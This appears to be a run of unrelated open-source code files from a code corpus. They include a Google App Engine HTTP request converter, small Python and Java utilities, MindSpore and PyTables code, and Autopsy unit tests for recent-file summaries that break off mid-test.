gaeRequest.addHeader(new HTTPHeader(header, entry.getValue()));
}
gaeRequest.addHeader(new HTTPHeader(HttpHeaders.USER_AGENT, USER_AGENT));
/**
* byte [] content is replayable and the only content type supportable by GAE. As such, we
* convert the original request content to a byte array.
*/
if (request.getPayload() != null) {
InputStream input = request.getPayload().getInput();
try {
byte[] array = ByteStreams.toByteArray(input);
if (!request.getPayload().isRepeatable()) {
Payload oldPayload = request.getPayload();
request.setPayload(array);
HttpUtils.copy(oldPayload.getContentMetadata(), request.getPayload().getContentMetadata());
}
gaeRequest.setPayload(array);
if (array.length > 0) {
gaeRequest.setHeader(new HTTPHeader("Expect", "100-continue"));
}
} catch (IOException e) {
Throwables.propagate(e);
} finally {
Closeables2.closeQuietly(input);
}
for (Entry<String, String> header : contentMetadataCodec.toHeaders(
request.getPayload().getContentMetadata()).entries()) {
if (!prohibitedHeaders.contains(header.getKey()))
gaeRequest.setHeader(new HTTPHeader(header.getKey(), header.getValue()));
}
}
return gaeRequest;
}
}
| 1,783 |
531 | // Copyright 1998-2019 Epic Games, Inc. All Rights Reserved.
#include "ProfilingBlocks.h"
#include "Modules/ModuleManager.h"
IMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, ProfilingBlocks, "ProfilingBlocks" );
| 70 |
994 | class Solution(object):
def isValid(self, s):
"""
:type s: str
:rtype: bool
"""
t = []
for x in s:
if x == '(' or x == '{' or x == '[':
t.append(x)
elif x == ')' and len(t) > 0 and t[-1] == '(':
c = t.pop()
elif x == ']' and len(t) > 0 and t[-1] == '[':
c = t.pop()
elif x == '}' and len(t) > 0 and t[-1] == '{':
c = t.pop()
else:
return False
if len(t) > 0:
return False
return True
| 378 |
310 | <reponame>dreeves/usesthis<filename>gear/software/k/kaleidoscope.json
{
"name": "Kaleidoscope",
"description": "A file and image diff app for the Mac.",
"url": "https://www.kaleidoscopeapp.com/"
} | 76 |
448 | <reponame>sintaxi/phonegap<gh_stars>100-1000
/**
* The MIT License
* -------------------------------------------------------------
* Copyright (c) 2008, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, Nitobi
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.nitobi.phonegap.api.impl;
import net.rim.device.api.system.Alert;
import com.nitobi.phonegap.api.Command;
/**
* Vibrates the phone if able.
*
* @author <NAME>
*
*/
public class NotificationCommand implements Command {
private static final int VIBRATE_COMMAND = 0;
private static final int BEEP_COMMAND = 1;
private static final int DURATION = 5;
private static final String CODE = "PhoneGap=notification";
private static final short A = 440; //440.00
private static final short NOTE_DURATION = 500;
private static final short PAUSE_DURATION = 50;
private static final int TUNE_LENGTH = 4;
private static final short[] TUNE = new short[]
{
A, NOTE_DURATION, 0, PAUSE_DURATION
};
/**
* Determines whether the specified instruction is accepted by the command.
* @param instruction The string instruction passed from JavaScript via cookie.
* @return true if the Command accepts the instruction, false otherwise.
*/
public boolean accept(String instruction) {
return instruction != null && instruction.startsWith(CODE);
}
public String execute(String instruction) {
switch (getCommand(instruction)) {
case VIBRATE_COMMAND:
if (Alert.isVibrateSupported()) Alert.startVibrate(getVibrateDuration(instruction));
break;
case BEEP_COMMAND:
if (Alert.isAudioSupported()) Alert.startAudio(getTune(instruction), 99);
break;
}
return null;
}
private int getCommand(String instruction) {
String command = instruction.substring(CODE.length()+1);
if (command.startsWith("beep")) return BEEP_COMMAND;
if (command.startsWith("vibrate")) return VIBRATE_COMMAND;
return -1;
}
/**
* Parses the vibrate instruction and tries to extract the specified duration. Returns the default duration if there are issues parsing.
* @param instruction The instruction called from the JS.
* @return The number of seconds the vibration should last.
*/
private int getVibrateDuration(String instruction) {
try {
return Integer.parseInt(instruction.substring(instruction.lastIndexOf('/') + 1));
} catch(Exception ex) {
return DURATION;
}
}
private short[] getTune(String instruction) {
String beepParam = instruction.substring(CODE.length()+1);
int param = 1;
try {
param = Integer.parseInt(beepParam.substring(beepParam.indexOf('/')+1));
} catch(Exception e) {
param = 1;
}
short[] theTune = new short[TUNE_LENGTH * param];
if (param == 1)
return TUNE;
else {
for (int i = 0; i < param; i++) {
System.arraycopy(TUNE, 0, theTune, i*TUNE_LENGTH, TUNE_LENGTH);
}
}
return theTune;
}
} | 1,218 |
3,200 | /**
* Copyright 2019 Huawei Technologies Co., Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <string>
#include <list>
#include <vector>
#include "common/common_test.h"
#include "frontend/parallel/strategy.h"
#include "frontend/parallel/ops_info/reduce_method_info.h"
#include "common/py_func_graph_fetcher.h"
#include "frontend/parallel/device_manager.h"
#include "frontend/parallel/step_parallel.h"
namespace mindspore {
namespace parallel {
using ReduceSumInfoPtr = std::shared_ptr<ReduceSumInfo>;
ReduceSumInfoPtr reduce_sum;
class TestReduceSumInfo : public UT::Common {
public:
TestReduceSumInfo() {}
void SetUp();
void TearDown() {}
};
void TestReduceSumInfo::SetUp() {
UT::InitPythonPath();
RankList dev_list;
for (int32_t i = 0; i < 34; i++) {
dev_list.push_back(i);
}
RankList stage_map;
stage_map.push_back(32);
stage_map.push_back(2);
int32_t local_dev = 0;
// create a new g_device_manager
g_device_manager = std::make_shared<DeviceManager>();
g_device_manager->Init(dev_list, local_dev, stage_map, "hccl");
Shapes inputs_shape = {{16, 32, 64}};
Shapes outputs_shape = {{16, 32}};
ValuePtr value = MakeValue(static_cast<int64_t>(-1));
ValuePtr value0;
std::vector<ValuePtr> val = {value0, value};
ValuePtr keep_dims = MakeValue(false);
std::unordered_map<std::string, ValuePtr> attr = {{KEEP_DIMS, keep_dims}};
reduce_sum = std::make_shared<ReduceSumInfo>("sum_info", inputs_shape, outputs_shape, attr);
reduce_sum->set_input_value(val);
}
TEST_F(TestReduceSumInfo, InferDevMatrixShape1) {
Strategys inputs = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, inputs);
reduce_sum->Init(strategy);
Shape dev_matrix_shape = reduce_sum->dev_matrix_shape();
Shape expect = {4, 8, 1};
ASSERT_EQ(dev_matrix_shape, expect);
}
TEST_F(TestReduceSumInfo, InferSliceShape1) {
Strategys str = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, str);
reduce_sum->Init(strategy);
std::vector<TensorInfo> inputs = reduce_sum->inputs_tensor_info();
std::vector<TensorInfo> outputs = reduce_sum->outputs_tensor_info();
Shape input_slice_shape_expect = {4, 4, 64};
Shape output_slice_shape_expect = {4, 4};
TensorInfo input_tensor_info = inputs.at(0);
TensorInfo output_tensor_info = outputs.at(0);
Shape input_slice_shape = input_tensor_info.slice_shape();
Shape output_slice_shape = output_tensor_info.slice_shape();
ASSERT_EQ(input_slice_shape, input_slice_shape_expect);
ASSERT_EQ(output_slice_shape, output_slice_shape_expect);
}
TEST_F(TestReduceSumInfo, GetTensorLayout1) {
Strategys str = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, str);
reduce_sum->Init(strategy);
std::vector<TensorInfo> inputs = reduce_sum->inputs_tensor_info();
std::vector<TensorInfo> outputs = reduce_sum->outputs_tensor_info();
TensorMap input_expect = {2, 1, 0};
TensorMap output_expect = {2, 1};
TensorInfo input_tensor_info = inputs.at(0);
TensorInfo output_tensor_info = outputs.at(0);
Map input_tensor_map = input_tensor_info.tensor_layout().origin_tensor_map();
Map output_tensor_map = output_tensor_info.tensor_layout().origin_tensor_map();
ASSERT_EQ(input_tensor_map.array(), input_expect);
ASSERT_EQ(output_tensor_map.array(), output_expect);
}
TEST_F(TestReduceSumInfo, GetForwardOp1) {
Strategys inputs = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, inputs);
reduce_sum->Init(strategy);
OperatorVector forward_op = reduce_sum->forward_op();
size_t size = forward_op.size();
ASSERT_EQ(size, 0);
}
TEST_F(TestReduceSumInfo, GetForwardOp2) {
Strategys inputs = {{4, 4, 2}};
StrategyPtr strategy = NewStrategy(0, inputs);
reduce_sum->Init(strategy);
OperatorVector forward_op = reduce_sum->forward_op();
OperatorArgs operator_args = forward_op.at(0).second;
OperatorAttrs operator_attrs = operator_args.first;
std::string arg0_name = operator_attrs.at(0).first;
ValuePtr arg0_value = operator_attrs.at(0).second;
std::string op_value = arg0_value->cast<StringImmPtr>()->ToString();
std::string arg1_name = operator_attrs.at(1).first;
ValuePtr arg1_value = operator_attrs.at(1).second;
std::string group_value = arg1_value->cast<StringImmPtr>()->ToString();
ASSERT_EQ(forward_op.at(0).first, "AllReduce");
ASSERT_EQ(forward_op.size(), 1);
ASSERT_EQ(arg0_name, "op");
ASSERT_EQ(op_value, "sum");
ASSERT_EQ(arg1_name, "group");
}
TEST_F(TestReduceSumInfo, GetMirrorOPs1) {
Strategys inputs = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, inputs);
reduce_sum->Init(strategy);
MirrorOps mirror_ops = reduce_sum->mirror_ops();
size_t size = mirror_ops.size();
ASSERT_EQ(size, 0);
}
TEST_F(TestReduceSumInfo, GetMirrorOPs2) {
Strategys inputs = {{4, 4, 1}};
StrategyPtr strategy = NewStrategy(0, inputs);
reduce_sum->Init(strategy);
MirrorOps mirror_ops = reduce_sum->mirror_ops();
OperatorVector mirror_op = mirror_ops.at(0);
OperatorArgs operator_args = mirror_op.at(0).second;
OperatorAttrs operator_attrs = operator_args.first;
std::string arg0_name = operator_attrs.at(0).first;
ValuePtr arg0_value = operator_attrs.at(0).second;
std::string group = arg0_value->cast<StringImmPtr>()->ToString();
ASSERT_EQ(mirror_op.at(0).first, "_MirrorOperator");
ASSERT_EQ(mirror_op.size(), 1);
ASSERT_EQ(arg0_name, "group");
}
TEST_F(TestReduceSumInfo, CheckStrategy1) {
Strategys inputs = {{2, 2, 8, 16}};
StrategyPtr strategy = NewStrategy(0, inputs);
Status ret = reduce_sum->Init(strategy);
ASSERT_EQ(ret, FAILED);
}
TEST_F(TestReduceSumInfo, CheckStrategy2) {
Strategys inputs = {{2, 4, 8}, {2, 4, 8}};
StrategyPtr strategy = NewStrategy(0, inputs);
Status ret = reduce_sum->Init(strategy);
ASSERT_EQ(ret, FAILED);
}
TEST_F(TestReduceSumInfo, CheckStrategy3) {
Strategys inputs = {{4, 4, 2}};
StrategyPtr strategy = NewStrategy(0, inputs);
Status ret = reduce_sum->Init(strategy);
ASSERT_EQ(ret, SUCCESS);
}
TEST_F(TestReduceSumInfo, CheckStrategy4) {
Strategys inputs = {{4, 8, 1}};
StrategyPtr strategy = NewStrategy(0, inputs);
Status ret = reduce_sum->Init(strategy);
ASSERT_EQ(ret, SUCCESS);
}
} // namespace parallel
} // namespace mindspore
| 2,465 |
2,293 | from __future__ import print_function,absolute_import,division,unicode_literals
_B=False
_A=None
from .anchor import Anchor
if _B:from typing import Text,Any,Dict,List
__all__=['ScalarBoolean']
class ScalarBoolean(int):
def __new__(D,*E,**A):
B=A.pop('anchor',_A);C=int.__new__(D,*E,**A)
if B is not _A:C.yaml_set_anchor(B,always_dump=True)
return C
@property
def anchor(self):
A=self
if not hasattr(A,Anchor.attrib):setattr(A,Anchor.attrib,Anchor())
return getattr(A,Anchor.attrib)
def yaml_anchor(A,any=_B):
if not hasattr(A,Anchor.attrib):return _A
if any or A.anchor.always_dump:return A.anchor
return _A
def yaml_set_anchor(A,value,always_dump=_B):A.anchor.value=value;A.anchor.always_dump=always_dump | 325 |
869 | <filename>doc/source/cookbook/py2exe_howto/pytables_test.py
import tables as tb
class Particle(tb.IsDescription):
name = tb.StringCol(16) # 16-character String
idnumber = tb.Int64Col() # Signed 64-bit integer
ADCcount = tb.UInt16Col() # Unsigned short integer
TDCcount = tb.UInt8Col() # Unsigned byte
grid_i = tb.Int32Col() # Integer
grid_j = tb.IntCol() # Integer (equivalent to Int32Col)
pressure = tb.Float32Col() # Float (single-precision)
energy = tb.FloatCol() # Double (double-precision)
with tb.open_file("tutorial.h5", mode="w", title="Test file") as h5file:
group = h5file.create_group("/", "detector", "Detector information")
table = h5file.create_table(group, "readout", Particle, "Readout example")
print(h5file)
particle = table.row
for i in range(10):
particle['name'] = f'Particle: {i:6d}'
particle['TDCcount'] = i % 256
particle['ADCcount'] = (i * 256) % (1 << 16)
particle['grid_i'] = i
particle['grid_j'] = 10 - i
particle['pressure'] = float(i * i)
particle['energy'] = float(particle['pressure'] ** 4)
particle['idnumber'] = i * (2 ** 34)
particle.append()
table.flush()
with tb.open_file("tutorial.h5", mode="r", title="Test file") as h5file:
table = h5file.root.detector.readout
pressure = [x['pressure']
for x in table.iterrows()
if x['TDCcount'] > 3 and 20 <= x['pressure'] < 50]
print(pressure)
| 636 |
584 | package com.mercury.platform.ui.adr.components.panel.tree.dialog;
import com.mercury.platform.shared.config.descriptor.adr.AdrComponentDescriptor;
import com.mercury.platform.shared.config.descriptor.adr.AdrProgressBarDescriptor;
import com.mercury.platform.ui.adr.components.panel.tree.AdrNodePanel;
import com.mercury.platform.ui.adr.components.panel.tree.model.AdrTreeNode;
import com.mercury.platform.ui.adr.components.panel.ui.MercuryTracker;
import com.mercury.platform.ui.misc.AppThemeColor;
import javax.swing.*;
import java.awt.*;
public class AdrDialogPBNodePanel extends AdrNodePanel<AdrProgressBarDescriptor> {
public AdrDialogPBNodePanel(AdrTreeNode<AdrComponentDescriptor> treeNode) {
super(treeNode);
this.mouseListener.setProcessSelect(false);
}
@Override
protected void update() {
}
@Override
public void onViewInit() {
JPanel root = this.componentsFactory.getJPanel(new FlowLayout(FlowLayout.CENTER));
root.setBackground(AppThemeColor.SLIDE_BG);
MercuryTracker tracker = new MercuryTracker(descriptor);
tracker.setValue((int) ((descriptor.getDuration() / 2) * 1000));
tracker.setPreferredSize(new Dimension(180, 30));
tracker.setShowCase(true);
root.add(tracker);
this.add(root, BorderLayout.CENTER);
}
}
| 508 |
1,473 | /*
* Autopsy Forensic Browser
*
* Copyright 2020 Basis Technology Corp. Contact: carrier <at> sleuthkit <dot>
* org
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package org.sleuthkit.autopsy.datasourcesummary.datamodel;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import java.util.stream.Stream;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Assert;
import static org.junit.Assert.fail;
import org.junit.Test;
import static org.mockito.ArgumentMatchers.anyInt;
import static org.mockito.ArgumentMatchers.anyLong;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.never;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentAttachmentDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentDownloadDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentFileDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.SleuthkitCaseProvider.SleuthkitCaseProviderException;
import org.sleuthkit.autopsy.testutils.RandomizationUtils;
import org.sleuthkit.autopsy.testutils.TskMockUtils;
import org.sleuthkit.datamodel.Blackboard;
import org.sleuthkit.datamodel.BlackboardArtifact;
import org.sleuthkit.datamodel.BlackboardArtifact.ARTIFACT_TYPE;
import org.sleuthkit.datamodel.BlackboardAttribute;
import org.sleuthkit.datamodel.BlackboardAttribute.ATTRIBUTE_TYPE;
import org.sleuthkit.datamodel.Content;
import org.sleuthkit.datamodel.DataSource;
import org.sleuthkit.datamodel.SleuthkitCase;
import org.sleuthkit.datamodel.TskCoreException;
/**
* Tests for RecentFilesSummaryTest
*/
public class RecentFilesSummaryTest {
/**
* An interface for calling methods in RecentFilesSummary in a uniform
* manner.
*/
private interface RecentFilesMethod<T> {
/**
* Means of acquiring data from a method in RecentFilesSummary.
*
* @param recentFilesSummary The RecentFilesSummary object.
* @param dataSource The datasource.
* @param count The number of items to retrieve.
*
* @return The method's return data.
*
* @throws SleuthkitCaseProviderException
* @throws TskCoreException
*/
List<T> fetch(RecentFilesSummary recentFilesSummary, DataSource dataSource, int count)
throws SleuthkitCaseProviderException, TskCoreException;
}
private static final RecentFilesMethod<RecentFileDetails> RECENT_DOCS_FUNCT
= (summary, dataSource, count) -> summary.getRecentlyOpenedDocuments(dataSource, count);
private static final RecentFilesMethod<RecentDownloadDetails> RECENT_DOWNLOAD_FUNCT
= (summary, dataSource, count) -> summary.getRecentDownloads(dataSource, count);
private static final RecentFilesMethod<RecentAttachmentDetails> RECENT_ATTACHMENT_FUNCT
= (summary, dataSource, count) -> summary.getRecentAttachments(dataSource, count);
/**
* If -1 count passed to method, should throw IllegalArgumentException.
*
* @param method The method to call.
* @param methodName The name of the metho
*
* @throws TskCoreException
* @throws SleuthkitCaseProviderException
*/
private <T> void testNonPositiveCount_ThrowsError(RecentFilesMethod<T> method, String methodName)
throws TskCoreException, SleuthkitCaseProviderException {
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(null);
DataSource dataSource = TskMockUtils.getDataSource(1);
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
try {
method.fetch(summary, dataSource, -1);
fail("Expected method " + methodName + " to fail on negative count.");
} catch (IllegalArgumentException ignored) {
verify(casePair.getRight(),
never().description("Expected negative count for " + methodName + " to not call any methods in SleuthkitCase."))
.getArtifacts(anyInt(), anyLong());
}
}
@Test
public void getRecentlyOpenedDocuments_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
testNonPositiveCount_ThrowsError(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
}
@Test
public void getRecentDownloads_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
testNonPositiveCount_ThrowsError(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
}
@Test
public void getRecentAttachments_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
testNonPositiveCount_ThrowsError(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
}
/**
* Tests that if no data source provided, an empty list is returned and
* SleuthkitCase isn't called.
*
* @param recentFilesMethod The method to call.
* @param methodName The name of the method
*
* @throws SleuthkitCaseProviderException
* @throws TskCoreException
*/
private <T> void testNoDataSource_ReturnsEmptyList(RecentFilesMethod<T> recentFilesMethod, String methodName)
throws SleuthkitCaseProviderException, TskCoreException {
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(null);
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
List<? extends T> items = recentFilesMethod.fetch(summary, null, 10);
Assert.assertNotNull("Expected method " + methodName + " to return an empty list.", items);
Assert.assertEquals("Expected method " + methodName + " to return an empty list.", 0, items.size());
verify(casePair.getRight(),
never().description("Expected null datasource for " + methodName + " to not call any methods in SleuthkitCase."))
.getArtifacts(anyInt(), anyLong());
}
@Test
public void getRecentlyOpenedDocuments_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNoDataSource_ReturnsEmptyList(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
}
@Test
public void getRecentDownloads_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNoDataSource_ReturnsEmptyList(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
}
@Test
public void getRecentAttachments_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNonPositiveCount_ThrowsError(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
}
/**
* If SleuthkitCase returns no results, an empty list is returned.
*
* @param recentFilesMethod The method to call.
* @param methodName The name of the method.
*
* @throws SleuthkitCaseProviderException
* @throws TskCoreException
*/
private <T> void testNoReturnedResults_ReturnsEmptyList(RecentFilesMethod<T> recentFilesMethod, String methodName)
throws SleuthkitCaseProviderException, TskCoreException {
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(Collections.emptyList());
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
DataSource dataSource = TskMockUtils.getDataSource(1);
List<? extends T> items = recentFilesMethod.fetch(summary, dataSource, 10);
Assert.assertNotNull("Expected method " + methodName + " to return an empty list.", items);
Assert.assertEquals("Expected method " + methodName + " to return an empty list.", 0, items.size());
verify(casePair.getRight(),
times(1).description("Expected " + methodName + " to call Blackboard once."))
.getArtifacts(anyInt(), anyLong());
}
@Test
public void getRecentlyOpenedDocuments_noReturnedResults_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNoReturnedResults_ReturnsEmptyList(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
}
@Test
public void getRecentDownloads_noReturnedResults_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNoReturnedResults_ReturnsEmptyList(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
}
@Test
public void getRecentAttachments_testNoDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNoReturnedResults_ReturnsEmptyList(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
}
private static final long DAY_SECONDS = 24 * 60 * 60;
/**
* A means of creating a number representing seconds from epoch where the
* lower the idx, the more recent the time.
*/
private static final Function<Integer, Long> dateTimeRetriever = (idx) -> (365 - idx) * DAY_SECONDS + 1;
/**
* Gets a mock BlackboardArtifact.
*
* @param ds The data source to which the artifact belongs.
* @param artifactId The artifact id.
* @param artType The artifact type.
* @param attributeArgs The mapping of attribute type to value for each
* attribute in the artifact.
*
* @return The mock artifact.
*/
private BlackboardArtifact getArtifact(DataSource ds, long artifactId, ARTIFACT_TYPE artType, List<Pair<ATTRIBUTE_TYPE, Object>> attributeArgs) {
try {
List<BlackboardAttribute> attributes = attributeArgs.stream()
.filter((arg) -> arg != null && arg.getLeft() != null && arg.getRight() != null)
.map((arg) -> {
return TskMockUtils.getAttribute(arg.getLeft(), arg.getRight());
})
.collect(Collectors.toList());
return TskMockUtils.getArtifact(new BlackboardArtifact.Type(artType), artifactId, ds, attributes);
} catch (TskCoreException ex) {
fail("There was an error mocking an artifact.");
return null;
}
}
/**
* Returns a mock artifact for getRecentlyOpenedDocuments.
*
* @param ds The datasource for the artifact.
* @param artifactId The artifact id.
* @param dateTime The time in seconds from epoch.
* @param path The path for the document.
*
* @return The mock artifact with pertinent attributes.
*/
private BlackboardArtifact getRecentDocumentArtifact(DataSource ds, long artifactId, Long dateTime, String path) {
return getArtifact(ds, artifactId, ARTIFACT_TYPE.TSK_RECENT_OBJECT, Arrays.asList(
Pair.of(ATTRIBUTE_TYPE.TSK_DATETIME_ACCESSED , dateTime),
Pair.of(ATTRIBUTE_TYPE.TSK_PATH, path)
));
}
@Test
public void getRecentlyOpenedDocuments_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
Function<Integer, String> pathRetriever = (idx) -> "/path/to/downloads/" + idx;
DataSource dataSource = TskMockUtils.getDataSource(1);
int countRequest = 10;
for (int countToGenerate : new int[]{1, 9, 10, 11}) {
// generate artifacts for each artifact
List<BlackboardArtifact> artifacts = new ArrayList<>();
for (int idx = 0; idx < countToGenerate; idx++) {
BlackboardArtifact artifact = getRecentDocumentArtifact(dataSource,
1000 + idx, dateTimeRetriever.apply(idx), pathRetriever.apply(idx));
artifacts.add(artifact);
}
// run through method
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, countRequest);
// verify results
int expectedCount = Math.min(countRequest, countToGenerate);
Assert.assertNotNull(results);
Assert.assertEquals(expectedCount, results.size());
for (int i = 0; i < expectedCount; i++) {
Assert.assertEquals(dateTimeRetriever.apply(i), results.get(i).getDateAsLong());
Assert.assertEquals(pathRetriever.apply(i), results.get(i).getPath());
}
}
}
@Test
public void getRecentlyOpenedDocuments_uniquePaths() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
BlackboardArtifact item1 = getRecentDocumentArtifact(dataSource, 1001, DAY_SECONDS, "/a/path");
BlackboardArtifact item2 = getRecentDocumentArtifact(dataSource, 1002, DAY_SECONDS + 1, "/a/path");
BlackboardArtifact item3 = getRecentDocumentArtifact(dataSource, 1003, DAY_SECONDS + 2, "/a/path");
List<BlackboardArtifact> artifacts = Arrays.asList(item2, item3, item1);
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, 10);
// verify results (only successItem)
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals((Long) (DAY_SECONDS + 2), results.get(0).getDateAsLong());
Assert.assertTrue("/a/path".equalsIgnoreCase(results.get(0).getPath()));
}
@Test
public void getRecentlyOpenedDocuments_filtersMissingData() throws SleuthkitCaseProviderException, TskCoreException {
DataSource dataSource = TskMockUtils.getDataSource(1);
BlackboardArtifact successItem = getRecentDocumentArtifact(dataSource, 1001, DAY_SECONDS, "/a/path");
BlackboardArtifact nullTime = getRecentDocumentArtifact(dataSource, 1002, null, "/a/path2");
BlackboardArtifact zeroTime = getRecentDocumentArtifact(dataSource, 10021, 0L, "/a/path2a");
List<BlackboardArtifact> artifacts = Arrays.asList(nullTime, zeroTime, successItem);
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
List<RecentFileDetails> results = summary.getRecentlyOpenedDocuments(dataSource, 10);
// verify results (only successItem)
Assert.assertNotNull(results);
Assert.assertEquals(1, results.size());
Assert.assertEquals((Long) DAY_SECONDS, results.get(0).getDateAsLong());
Assert.assertTrue("/a/path".equalsIgnoreCase(results.get(0).getPath()));
}
/**
* Creates a mock blackboard artifact for getRecentDownloads.
*
* @param ds The datasource.
* @param artifactId The artifact id.
* @param dateTime The time in seconds from epoch.
* @param domain The domain.
* @param path The path for the download.
*
* @return The mock artifact.
*/
private BlackboardArtifact getRecentDownloadArtifact(DataSource ds, long artifactId, Long dateTime, String domain, String path) {
return getArtifact(ds, artifactId, ARTIFACT_TYPE.TSK_WEB_DOWNLOAD, Arrays.asList(
Pair.of(ATTRIBUTE_TYPE.TSK_DATETIME_ACCESSED, dateTime),
Pair.of(ATTRIBUTE_TYPE.TSK_DOMAIN, domain),
Pair.of(ATTRIBUTE_TYPE.TSK_PATH, path)
));
}
@Test
public void getRecentDownloads_sortedByDateTimeAndLimited() throws SleuthkitCaseProviderException, TskCoreException {
Function<Integer, String> domainRetriever = (idx) -> String.format("www.domain%d.com", idx);
Function<Integer, String> pathRetriever = (idx) -> "/path/to/downloads/doc" + idx + ".pdf";
// run through method
DataSource dataSource = TskMockUtils.getDataSource(1);
int countRequest = 10;
for (int countToGenerate : new int[]{1, 9, 10, 11}) {
// generate artifacts for each artifact
List<BlackboardArtifact> artifacts = new ArrayList<>();
for (int idx = 0; idx < countToGenerate; idx++) {
BlackboardArtifact artifact = getRecentDownloadArtifact(dataSource,
1000 + idx, dateTimeRetriever.apply(idx), domainRetriever.apply(idx),
pathRetriever.apply(idx));
artifacts.add(artifact);
}
// call method
Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(RandomizationUtils.getMixedUp(artifacts));
RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
List<RecentDownloadDetails> results = summary.getRecentDownloads(dataSource, countRequest);
// verify results
int expectedCount = Math.min(countRequest, countToGenerate);
Assert.assertNotNull(results);
Assert.assertEquals(expectedCount, results.size());
for (int i = 0; i < expectedCount; i++) {
